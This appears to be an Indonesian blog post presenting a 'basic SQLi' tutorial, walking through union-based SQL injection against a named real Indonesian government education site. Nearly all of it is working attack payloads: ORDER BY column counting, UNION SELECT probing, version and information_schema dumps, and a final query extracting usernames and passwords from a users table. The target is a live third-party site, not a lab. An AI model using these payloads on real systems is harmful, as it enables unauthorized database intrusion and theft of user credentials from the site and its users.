Disini saya gak bermaksud untuk merusak ataupun show-off yah :)
saya akan coba sharing yang namanya basic-SQLi karena kalau untuk pemula error based merupakan dasar kita untuk advance sql injection.
itung-itung bisa lancar manualnya, oke kita langsung aja yah :)
saya akan coba sharing yang namanya basic-SQLi karena kalau untuk pemula error based merupakan dasar kita untuk advance sql injection.
itung-itung bisa lancar manualnya, oke kita langsung aja yah :)
1. Vull sql injection :
http://belajar.kemdiknas.go.id/index.php?display=home&forum=1&IDMP=0&IDkls=99999999
Code :
IDkls=99999999 order by 10-- false
IDkls=99999999 order by 9-- false
IDkls=99999999 order by 8-- false
IDkls=99999999 order by 7-- false
IDkls=99999999 order by 6-- true
Oke .. berarti true kita di " order by 6-- "
Berarti adalah valid kolomnya.
2. Sekarang cari valid string atau no togel :
code :
IDkls=99999999+union+all+select+1,2,3,4,5,6--
- Perhatikan angka yang keluar ( paling atas/top page) yups.. "4"
- Angka 4 ini merupakan valid stringnya.
3. Menampilkan versinya :
code :
IDkls=-99999999+union+all+select+1,2,3,version(),5,6--
- versi : 5.1.41-3ubuntu12.99
- ganti angka 4 dengan : version(), database(), @@version dsb .
4. Menampilkan Table DB :
code:
IDkls=-99999999+union+all+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where+table_schema=database()--
- group_concat = perintah untuk menampilkan
- (table_name) = nama - nama table
5. Menampilkan Columnnya :
IDkls=-99999999+union+all+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_schema=database()--
Cukup ganti :
(table_name) dengan (column_name)
information_schema.tables" dengan information_schema.columns
6. Oke.. Kita cari table dari users :
code:
IDkls=-99999999+union+all+select+1,2,3,group_concat(username,0x3a,password),5,6 from users--
0 komentar:
Posting Komentar